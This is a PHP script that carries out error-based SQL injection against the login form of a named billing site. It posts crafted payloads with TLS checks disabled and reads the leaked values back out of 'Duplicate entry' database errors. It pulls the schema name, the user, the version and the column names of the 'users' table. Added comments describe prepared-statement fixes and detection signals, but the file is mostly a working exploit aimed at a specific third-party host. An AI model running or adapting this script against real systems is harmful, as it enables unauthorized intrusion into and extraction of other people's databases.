php set_time_limit false ignore_user_abort true site https billing zug

<?php
// Lift PHP's execution time limit: without strict_types, false is coerced to 0, which means "no limit".
set_time_limit(false);
// Keep running even if the client that started the script disconnects.
ignore_user_abort(true);
// Base URL that every request made by query() is POSTed to.
$site = 'https://billing.zugres.net';
/**
 * Sends one POST to $site whose `login` field carries an error-based SQL
 * injection string wrapped around $query, then extracts the value that comes
 * back inside a "Duplicate entry" database error in the response body.
 *
 * Review notes (defender view):
 *  - The technique depends on two server-side conditions: the `login` value is
 *    concatenated into an SQL statement, and raw database error text is
 *    returned to the client. Bound parameters / prepared statements remove the
 *    first; generic error pages with server-side-only logging remove the second.
 *  - Useful detection signals: POST bodies containing `GROUP BY CONCAT(` together
 *    with `FLOOR(RAND(0)*2)` or `information_schema`; bursts of "Duplicate entry"
 *    errors in the database log; repeated form posts with a random six-digit
 *    `card`, an empty `password` and `act=1`.
 *
 * @param string $site  URL the request is sent to.
 * @param string $query SQL expression interpolated verbatim into the payload;
 *                      MID(..., 1, 63) limits the leaked value to 63 characters.
 * @return string|null  Text captured from the error message. When the response
 *                      has no matching error, $data[1] is unset and PHP yields
 *                      null with a warning.
 */
function query($site, $query) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $site,
// Return the response body as a string instead of printing it.
CURLOPT_RETURNTRANSFER => true,
// Both TLS checks are switched off: hostname and certificate chain are not verified.
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false
));
curl_setopt_array($ch, array(
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array(
// Fresh random six-digit value on every request.
'card' => rand(100000, 999999),
// Injection string: closes the quoted value, forces a duplicate-key error whose
// message embeds the result of $query, and comments out the rest of the statement.
'login' => "' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(($query), 1, 63), FLOOR(RAND(0)*2))) -- '",
'password' => '',
'act' => '1'
)
));
// The response is converted from KOI8-R to UTF-8 before matching.
$res = iconv('koi8-r', 'UTF-8', curl_exec($ch));
// Capture the quoted value from the error text; the trailing \d drops the 0/1
// that FLOOR(RAND(0)*2) appended inside CONCAT().
preg_match('/Duplicate entry \'(.*?)\d\'/', $res, $data);
return $data[1];
}
// Four probes through query(): current schema name, database account, server
// version, and the number of tables in that schema. Each call is one HTTP POST to $site.
$db = query($site, 'database()');
$user = query($site, 'user()');
$version = query($site, 'version()');
// The schema name returned by the server is concatenated into this probe as-is.
$c_tables = query($site, 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\''.$db.'\'');
// Only host and schema name are printed; the remaining output lines are disabled.
echo '<b>Host: </b> ' . $site . '<br/>';
echo '<b>Database: </b> ' . $db . '<br/>';
//echo '<b>User: </b> ' . $user . '<br/>';
//echo '<b>MySQL Version: </b> ' . $version . '<br/>';
//echo '<b>Count tables: </b> ' . $c_tables . '<br/>';
// Disabled block: would list table names one request at a time via LIMIT i,1.
/*echo '<b>Tables:</b><pre>' . "\n-----\n";
$tables = [];
for($i = 0; $i < $c_tables; $i++) {
$tables[] = query($site, 'SELECT table_name FROM information_schema.tables WHERE table_schema=\''.$db.'\' LIMIT '.$i.',1');
echo $tables[$i] . "\n";
}
echo '-----</pre>';*/
// Counts columns of every table named `users`; there is no table_schema filter,
// so same-named tables in other schemas are counted too.
$c_users = query($site, 'SELECT COUNT(*) FROM information_schema.columns WHERE table_name=\'users\''); //count columns
echo '<b>Columns table `users`:</b><pre>' . "\n-----\n";
// One request per column name. Seen from the server, the whole run is 5 + N
// consecutive POSTs from one client (N = column count), each of which triggers a
// database error; that pattern is what rate limiting and error-rate alerting should catch.
for($i = 0; $i < $c_users; $i++)
echo query($site, 'SELECT column_name FROM information_schema.columns WHERE table_name=\'users\' LIMIT '.$i.',1') . "\n";
echo '-----</pre>';